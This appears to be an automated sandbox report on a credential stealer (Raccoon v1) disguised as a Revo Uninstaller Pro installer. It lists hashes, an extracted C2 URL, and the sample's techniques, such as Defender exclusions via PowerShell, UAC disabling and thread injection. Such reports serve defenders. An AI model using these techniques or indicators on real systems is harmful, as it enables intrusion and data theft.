Analysis
-
max time kernel
147s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 14:53
Static task
static1
Behavioral task
behavioral1
Sample
0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
-
Size
18.8MB
-
MD5
0b3937c39ea113c3352090ac5ce26103
-
SHA1
9db17df61d6222c8d96a3969887d27c1568e4e7b
-
SHA256
2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799
-
SHA512
0bd27f4d58ccfc4b950d727f402ba260f98bf0e99d0f71bba4baa38131fcb0675d0b3105db3bf6bfb95388f0a717a54494ad9be889772b40e5b38f675564aa30
-
SSDEEP
393216:6Y+TwhZBn9zau6aa17rtANXDa8H1Ecuv9WA2R+y3prshUy:6Y+UV9zau6lKNTLJ29QRy
Malware Config
Extracted
raccoon
1.7.3
0343d4da493d263f78921a8724ca6adf05347cfe
-
url4cnc
https://telete.in/jbitchsucks
Signatures
-
Raccoon Stealer V1 payload 2 IoCs
resource yara_rule behavioral2/memory/2752-679-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral2/memory/2752-681-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1572 powershell.exe 4312 powershell.exe 4692 powershell.exe 2932 powershell.exe 1520 powershell.exe 2012 powershell.exe 4072 powershell.exe 3464 powershell.exe 3996 powershell.exe 1200 powershell.exe 964 powershell.exe 2880 powershell.exe 4692 powershell.exe 2248 powershell.exe 3856 powershell.exe 1136 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5076 bitsadmin.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\DRIVERS\SETC573.tmp rundll32.exe File created C:\Windows\system32\DRIVERS\SETC573.tmp rundll32.exe File opened for modification C:\Windows\system32\DRIVERS\revoflt.sys rundll32.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4924 netsh.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation ruplp.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation WScript.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 14 IoCs
pid Process 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 3948 Revo Uninstaller Pro 4.2.3.exe 3340 Revo Uninstaller Pro 4.2.3.tmp 2596 ruplp.exe 3380 RevoUninPro.exe 4644 RevoUninPro.exe 1184 ruplp.exe 4008 7z.exe 1872 7z.exe 1520 7z.exe 4612 111.exe 4760 111.exe 64 111.exe 2752 111.exe -
Loads dropped DLL 9 IoCs
pid Process 4540 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp 3340 Revo Uninstaller Pro 4.2.3.tmp 3340 Revo Uninstaller Pro 4.2.3.tmp 3340 Revo Uninstaller Pro 4.2.3.tmp 3340 Revo Uninstaller Pro 4.2.3.tmp 1040 regsvr32.exe 4008 7z.exe 1872 7z.exe 1520 7z.exe -
Modifies system executable filetype association 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 raw.githubusercontent.com 25 raw.githubusercontent.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4612 set thread context of 2752 4612 111.exe 139 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SQ2IF.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-2SAH8.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M285L.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BH5TN.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-E8NN8.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-98A4K.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-TMR6O.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PIF2G.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-QTSI6.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-T6OE0.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HESS8.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1CO13.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I4R82.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KF950.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1DEPE.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8EBPQ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-B842V.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-0CNGL.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DBS9F.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-11D5K.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5EJO.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I0JB7.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MGU6R.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GUGQ9.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7IFIE.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-JLN3A.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7OTPS.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MRVBA.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-OOVS2.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-1OS3J.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-D5T18.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1AJUU.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-2BPEO.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PSTB9.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7RJU1.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-DIHT4.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-NNFCT.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P30VC.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5SN49.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KSQCR.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-D5QS7.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8SAF9.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-L3SUU.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-86AVN.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-LO1UR.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P9GR5.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files (x86)\is-H9BQU.tmp 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SHUNJ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5H27N.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4JI7F.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CFCOM.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1ALQI.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BMARA.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PH91H.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7MFPL.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-00GEF.tmp Revo Uninstaller Pro 4.2.3.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruplp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Revo Uninstaller Pro 4.2.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mode.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruplp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Revo Uninstaller Pro 4.2.3.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 runonce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz runonce.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1028 timeout.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell\open\command Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" ruplp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\{305CA226-D286-468e-B848-2B2E8E697B74} 2 = "8" Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\Software\Classes\.ruel Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\FLAGS\ = "0" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32 ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510 ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 ruplp.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command Revo Uninstaller Pro 4.2.3.tmp Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder\Attributes = "48" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\ = "LicProtector Object" ruplp.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F} ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\.ruel Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32 ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32\ = "C:\\PROGRA~1\\VSREVO~1\\REVOUN~1\\ruplp.exe" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell\open Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0} ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" ruplp.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp -
Suspicious behavior: EnumeratesProcesses 44 IoCs
